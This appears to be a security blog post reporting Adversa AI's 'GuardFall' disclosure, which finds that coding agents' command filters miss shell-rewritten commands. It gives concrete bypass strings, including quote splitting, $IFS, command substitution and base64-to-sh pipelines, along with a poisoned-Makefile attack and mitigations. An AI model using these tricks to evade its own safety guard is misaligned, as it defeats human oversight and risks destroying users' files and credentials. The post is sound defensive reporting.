GuardFall: 10 of 11 Open-Source AI Coding Agents Fail a 30-Year-Old Shell Trick

Adversa AI — the same research group behind May’s TrustFall and SymJack disclosures — is back with a third finding, and this one is almost embarrassing in how old the trick is. Published June 30, GuardFall shows that 10 of 11 popular open-source AI coding agents can be talked into running a command their safety filter was explicitly designed to block, using command-injection techniques that predate most of the developers who wrote those filters.

The root cause is a one-sentence architectural mismatch: the guard inspects the raw command string, but bash rewrites that string before executing it. A filter that blocks the literal text rm -rf has no idea what to do with a string that only becomes rm -rf after the shell finishes expanding quotes, variables, and substitutions. By the time the dangerous command actually runs, the safety check is looking at a different, older version of reality.
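A minimal Python sketch makes the mismatch concrete. The `BLOCKLIST` regex is a hypothetical stand-in for a raw-string filter, not any tested agent's actual code, and `shlex.split` only approximates bash's quote removal (it performs no variable or command expansion).

```python
import re
import shlex

# Hypothetical raw-string filter: flags the literal text "rm -rf".
BLOCKLIST = re.compile(r"\brm\s+-rf\b")

def flagged(text: str) -> bool:
    """Return True when the text contains the blocked pattern."""
    return bool(BLOCKLIST.search(text))

def normalize(command: str) -> str:
    """Approximate what the shell sees after quote removal."""
    return " ".join(shlex.split(command))

command = "r''m -rf /tmp/demo"
print(flagged(command))             # False: the raw text never contains "rm"
print(normalize(command))           # rm -rf /tmp/demo
print(flagged(normalize(command)))  # True: same filter, different input
```

The filter itself is unchanged between the two calls. Only the string it is handed differs, which is the whole problem.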

Five Ways to Say “rm -rf” Without Saying It

Adversa AI’s paper documents five distinct bypass classes, and none of them require anything beyond a standard POSIX shell:

Quote splitting — r''m reads as two harmless tokens to a naive regex, but bash strips the empty quotes and executes rm.
$IFS expansion — the shell’s Internal Field Separator variable expands to whitespace, so rm$IFS-rf$IFS/ sails past filters that only look for a literal space character.
Command substitution — $(echo rm) -rf /, or a destructive command nested inside echo "$(rm /etc/x)", hides the payload inside an evaluation context the guard doesn’t unwrap.
Base64 pipelines — echo <base64> | base64 -d | sh defeats any filter that analyzes commands segment-by-segment, since the dangerous content only exists after the pipeline composes.
Alternative destructive utilities — find /x -delete, dd of=/dev/sda, tar -C / -x achieve the same outcome as rm -rf without ever containing the string rm.
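As a rough illustration of the five classes, the sketch below checks one example payload per class against a hypothetical raw-string regex, then again after simple quote removal. The payload strings and the `/tmp/x` path are illustrative assumptions, not Adversa AI's test cases, and nothing here is executed by a shell.

```python
import base64
import re
import shlex

NAIVE = re.compile(r"\brm\s+-rf\b")  # hypothetical raw-string filter

# Built at runtime so the encoded text is guaranteed to match the payload.
encoded = base64.b64encode(b"rm -rf /tmp/x").decode()

PAYLOADS = {
    "quote splitting": "r''m -rf /tmp/x",
    "$IFS expansion": "rm$IFS-rf$IFS/tmp/x",
    "command substitution": "$(echo rm) -rf /tmp/x",
    "base64 pipeline": f"echo {encoded} | base64 -d | sh",
    "alternative utility": "find /tmp/x -delete",
}

def evades_raw(command: str) -> bool:
    """True when the filter misses the unprocessed command text."""
    return NAIVE.search(command) is None

def evades_after_quote_removal(command: str) -> bool:
    """True when the filter still misses after shlex-style quote removal."""
    return NAIVE.search(" ".join(shlex.split(command))) is None

for name, command in PAYLOADS.items():
    print(f"{name:22} raw={evades_raw(command)} "
          f"unquoted={evades_after_quote_removal(command)}")
```

Under these assumptions all five payloads slip past the raw check, and quote removal alone only catches the first. The other four need expansion, substitution, pipeline, and utility awareness, which is why tokenizing by itself is not enough.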

None of these are new to offensive security — they’re straight out of decades-old CTF and shell-scripting lore. What’s new is that they’re now sufficient to defeat the safety layer of tools that read your codebase and execute commands with your account’s full privileges.

Who Failed, Who Didn’t

Adversa AI live-tested production binaries of 11 agents, representing roughly 548,000 combined GitHub stars, and sorted the results into four failure modes:

Failure mode	Agents	What happened
Regex matches raw, unprocessed string	Hermes, opencode, Goose	Failed all five bypass classes; Goose leaked 22 of 23 test cases, opencode leaked 16 of 16
Tokenizes, but still reasons about raw text	Cline, Roo-Code	Better, but still fails on quoted substitutions and per-flag reasoning; Cline leaked 2 of 13 in allow+deny mode
No static guard at all	Aider, Plandex, Open Interpreter	Relies entirely on human approval — defeated the moment auto-execute flags are enabled, which CI pipelines do routinely
Sandbox-only, with a documented opt-out	OpenHands, SWE-agent	Containers work when active, but a documented local-mode flag removes the containment entirely

Continue was the only agent that held up, passing all 24 penetration attempts with zero leaks. Its approach is unglamorous but correct: tokenize the command the way bash’s own quoting rules would, detect variable expansion, recursively evaluate command substitutions, check where pipes actually terminate, and keep an explicit deny-list of canonical destructive patterns evaluated after that normalization — not before it.
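The normalize-then-check order can be sketched in Python as follows. This is not Continue's code: the function names, the `DESTRUCTIVE` and `SHELLS` lists, and the three-way `allow`/`ask`/`deny` verdict are all assumptions made for illustration, and the sketch requires Python 3.8 or later for `shlex` punctuation handling.

```python
import os
import shlex

# Illustrative lists only; a real guard would need far broader coverage.
DESTRUCTIVE = {"rm", "dd", "shred", "mkfs"}
SHELLS = {"sh", "bash", "dash", "zsh"}

def split_stages(command):
    """Tokenize with POSIX quoting rules and split on |, ; and &."""
    lexer = shlex.shlex(command, posix=True, punctuation_chars="|;&")
    lexer.whitespace_split = True
    lexer.commenters = ""
    stages, current = [], []
    for token in lexer:
        if token and set(token) <= set("|;&"):
            stages.append(current)
            current = []
        else:
            current.append(token)
    stages.append(current)
    return [stage for stage in stages if stage]

def substitution_bodies(command):
    """Return the text inside each outermost $(...), tracked by paren depth."""
    bodies, depth, start, i = [], 0, 0, 0
    while i < len(command):
        if depth == 0 and command.startswith("$(", i):
            depth, start, i = 1, i + 2, i + 2
            continue
        if depth and command[i] == "(":
            depth += 1
        elif depth and command[i] == ")":
            depth -= 1
            if depth == 0:
                bodies.append(command[start:i])
        i += 1
    return bodies

def verdict(command):
    """Return 'deny', 'ask', or 'allow' for a command string."""
    try:
        stages = split_stages(command)
    except ValueError:
        return "deny"  # unbalanced quotes: fail closed
    # Recurse into command substitutions before judging the outer command.
    if any(verdict(body) == "deny" for body in substitution_bodies(command)):
        return "deny"
    for index, argv in enumerate(stages):
        name = os.path.basename(argv[0])
        if name in DESTRUCTIVE or (name == "find" and "-delete" in argv):
            return "deny"
        if index > 0 and name in SHELLS:
            return "deny"  # a shell after a pipe or separator runs unseen text
    # Expansions that cannot be resolved statically go to a human.
    return "ask" if "$" in command or "`" in command else "allow"

print(verdict("r''m -rf /tmp/x"))
print(verdict("echo payload | base64 -d | sh"))
print(verdict("rm$IFS-rf$IFS/tmp/x"))
```

The sketch deliberately errs toward false positives, and it still ignores newlines as separators, backticks, redirections, and aliases. In an unattended run, `ask` would have to be treated as `deny`.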

The Attack in Practice

The paper’s proof-of-concept is the part worth internalizing, because it doesn’t require tricking anyone into typing a suspicious command. It requires a pull request:

An attacker submits a PR containing a poisoned Makefile, with a clean target that runs rm -rf "$$HOME/.aws/credentials".
A developer’s agent reads the Makefile — completely normal, unremarkable behavior for any coding agent.
The agent later runs make test, which depends on clean as a prerequisite.
With auto-execute enabled (the default in most CI configurations), the destructive command runs with no filter catching it, because the guard never saw the literal string rm -rf — it saw a make invocation.
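To see why the guard is blind here, it helps to expand the `make` target into the recipe lines it would actually run. The Python sketch below does that for a toy Makefile shaped like the one in the proof-of-concept. The `pytest -q` recipe and both helper functions are assumptions for illustration, and the parser handles only simple explicit rules (no variables, includes, pattern rules, or `$(shell ...)`).

```python
# Toy Makefile modelled on the scenario above; the test recipe is assumed.
POISONED_MAKEFILE = (
    "test: clean\n"
    "\tpytest -q\n"
    "\n"
    "clean:\n"
    "\trm -rf \"$$HOME/.aws/credentials\"\n"
)

def parse_rules(text):
    """Parse simple 'target: prereqs' rules with tab-indented recipes."""
    rules, current = {}, None
    for line in text.splitlines():
        if line.startswith("\t"):
            if current is not None:
                # make turns $$ into a literal $ before invoking the shell.
                recipe_line = line[1:].replace("$$", "$")
                rules[current]["recipe"].append(recipe_line)
        elif ":" in line and not line.lstrip().startswith("#"):
            target, _, prereqs = line.partition(":")
            current = target.strip()
            rules[current] = {"prereqs": prereqs.split(), "recipe": []}
    return rules

def commands_for(target, rules, seen=None):
    """List the recipe lines make would run for target, prerequisites first."""
    seen = set() if seen is None else seen
    if target in seen or target not in rules:
        return []
    seen.add(target)
    commands = []
    for prereq in rules[target]["prereqs"]:
        commands += commands_for(prereq, rules, seen)
    return commands + rules[target]["recipe"]

rules = parse_rules(POISONED_MAKEFILE)
for line in commands_for("test", rules):
    print(line)
```

A guard that only inspects the string `make test` never sees the first line this prints. Any real defense would need make's own semantics or, more robustly, a control that does not depend on reading the recipe at all.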

This is the same supply-chain shape as May’s TrustFall/Miasma story: you don’t need to compromise the developer’s judgment, you need to compromise a file the agent is going to read as a matter of course.

Where Does Claude Code Fit In?

Notably, Claude Code isn’t on Adversa AI’s tested list: the survey selected purely by open-source GitHub stars, and Claude Code is closed-source. That’s worth being honest about rather than claiming an unearned pass, because the underlying architectural question (“does the guard reason about the command bash will actually run, or the command text it was handed?”) applies to any agent with a text-based permission layer, proprietary or not. Anthropic’s own trust-dialog design has been criticized before: Claude Code was one of four agents affected by TrustFall in May, and Anthropic’s response was to describe the one-keypress RCE pattern as falling within its stated threat model rather than as a bug.

What GuardFall does reinforce is the direction Claude Code has been moving since v2.1.187’s sandbox.credentials: away from pattern-matching specific commands and toward deny-by-default access control over resources (credential files, specific directories) regardless of how a command is spelled. A filter that blocks reads of ~/.aws/credentials at the filesystem layer doesn’t care whether the command that tried to read it was cat, dd, or a base64-decoded pipeline — it never had to parse the command text correctly in the first place. That’s a structurally stronger guarantee than any command-string blocklist, however well-tokenized, because it doesn’t depend on enumerating every way bash can be asked to do something.
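The decision rule behind a resource-level control is small enough to sketch. The Python below is an illustration of deny-by-default path checking only. It is not Claude Code's `sandbox.credentials` implementation, the `/work/repo` and `/home/dev` paths are hypothetical, and real enforcement belongs in the OS or sandbox layer, where symlinks are resolved too.

```python
import posixpath

def is_allowed(path, allowed_roots, cwd):
    """Deny by default: permit a path only if it resolves under an allowed root."""
    # Resolve relative paths and ".." segments lexically (symlinks not handled).
    resolved = posixpath.normpath(posixpath.join(cwd, path))
    for root in allowed_roots:
        root = posixpath.normpath(root)
        if resolved == root or resolved.startswith(root.rstrip("/") + "/"):
            return True
    return False

roots = ["/work/repo"]
print(is_allowed("src/main.py", roots, cwd="/work/repo"))
print(is_allowed("../../home/dev/.aws/credentials", roots, cwd="/work/repo"))
print(is_allowed("/home/dev/.aws/credentials", roots, cwd="/work/repo"))
```

Nothing in the check mentions `rm`, `cat`, `dd`, or any other command name. The only question is which resource is being touched, so there is no command spelling to get wrong.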

What to Actually Do About It

If you or your team run any of the ten vulnerable agents, Adversa AI’s mitigations are worth applying this week, not this quarter:

Redirect $HOME to a throwaway sandbox directory before running the agent, so that ~/.ssh and ~/.aws resolve inside the sandbox instead of to your real credentials, regardless of what the guard does or doesn’t catch.
Disable auto-execute flags (--auto-exec, --auto-run, --auto-test and equivalents) unless the workflow is genuinely non-interruptible — most CI configurations enable these by default without anyone revisiting the decision.
Block agent execution on pull requests from forks. The Makefile scenario above requires nothing more than an accepted external PR.
Treat repository configuration files as untrusted input — Makefile, .aider.conf.yml, package.json scripts, and CI YAML are all attacker-reachable the moment your agent reads them.
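The first mitigation can be sketched as a small Python wrapper. The function name `run_with_throwaway_home` is hypothetical, and the child process here is just a Python one-liner standing in for an agent invocation.

```python
import os
import subprocess
import sys
import tempfile

def run_with_throwaway_home(argv):
    """Run argv with HOME pointing at a temporary directory, then discard it."""
    with tempfile.TemporaryDirectory(prefix="agent-home-") as fake_home:
        env = dict(os.environ, HOME=fake_home)
        result = subprocess.run(
            argv, env=env, capture_output=True, text=True, check=False
        )
        return fake_home, result

# Stand-in for an agent: report where "~" points inside the child process.
fake_home, result = run_with_throwaway_home(
    [sys.executable, "-c", "import os; print(os.path.expanduser('~'))"]
)
print(result.stdout.strip() == fake_home)
```

This only changes how `~` and `$HOME` resolve on POSIX systems. A command that names your real home directory by absolute path is not stopped, so the redirect works best alongside a container or OS-level sandbox.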

Longer term, Adversa AI’s advice generalizes past this specific research: don’t trust a command filter that was never tested against the five bypass classes above, and prefer tools that enforce access control at the resource level over ones that try to out-parse bash at the string level. Unix shells have been rewriting strings before executing them since the 1970s, well before bash itself appeared in 1989. When a safety layer built after that fact still loses to it, that isn’t a bug to patch; it’s a design assumption to retire.

Sources: Adversa AI — GuardFall disclosure · The Hacker News — GuardFall coverage · Security Affairs — GuardFall flaw hits 10 of 11 agents · SC Media — shell injection flaw brief · Mallory — GuardFall story
